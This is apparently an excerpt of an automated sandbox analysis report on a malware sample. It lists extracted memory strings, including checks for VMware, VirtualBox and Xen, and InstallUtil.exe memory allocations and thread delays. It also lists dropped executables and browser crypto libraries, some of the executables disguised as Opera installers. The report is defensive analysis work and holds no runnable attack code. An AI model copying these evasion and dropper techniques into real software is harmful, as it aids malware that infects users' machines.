                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 1F817500000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 1F830FD0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1810000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3220000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 5220000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 79B0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 7530000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 95F0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: A5F0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B0D0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C210000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: D210000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: E210000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: E840000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 8DB0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 7B70000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: E840000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: F840000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C210000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 8DB0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: CC10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,16_2_00401B4B
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 300000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599822
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599671
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599368
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599031
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598788
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598667
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598561
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598417
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598276
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598136
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598015
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597649
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597527
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597379
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597057
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596941
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596592
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596447
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596191
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595691
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595571
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595412
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595046
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594907
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594368
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594191
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593858
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593057
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592816
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592633
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592169
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591953
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591125
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590906
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590109
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589858
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589672
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 588734
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 588468
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 587531
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 585843
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 585500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 585156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584684
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584373
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584181
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583788
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583093
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 582906
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 582593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 582125
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 581828
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 581515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 581234
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580962
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580777
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580553
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580078
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579764
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579608
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579418
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579047
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578062
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577218
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 576718
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 576203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 575797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 575390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 574890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 573625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 572984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 572172
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 571250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 569531
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 567953
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 567406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 566984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 566156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 565328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 564625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 563703
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 562890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 561922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 561281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 560609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 559609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 558734
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 557781
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 556687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 555359
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 554500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 553687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 550154
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 549123
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 548388
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 547285
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 546625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 545943
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 544442
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 543574
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 542777
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 541993
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 540668
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 540261
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 539466
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 538740
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 538374
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537716
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537483
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537249
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536944
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536694
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536376
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536049
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535747
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535508
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535314
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535010
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 534399
                        Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 5162Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1052Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6667Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8571
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\ZMwlUWMtiNLOgzHdIp3EVbeM.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\eEM7C0Rv28sfywWhlfTCHeZU.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-NP3DM.tmpJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Opera_108.0.5067.24_Autoupdate_x64[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\qz6mIWczIdkFWvUoxRClMBD1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\sI7dZrzWguf80YTd4w1tJlxT.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libogg-0.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\3TgecgfsPBFevp0C7lLcJJOk.exeJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Opera_108.0.5067.24_Autoupdate_x64[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\unins000.exe (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libvorbis-0.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027440668612.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\4Q81HIYmOK1SegnFxkPpwM9e.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\CetLHNUiPRGPPEJBiP5m1V59.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-QD6MG.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\K8iQZVR1QcKL7tq874t7OVK9.exeJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280932613620.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\fHmeBOFDBp1fU4tXtZW1SwCU.exeJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275032111804.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210274997611284.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\vhpTjyAyaRSCIHDXWEzEV7G1.exeJump to dropped file
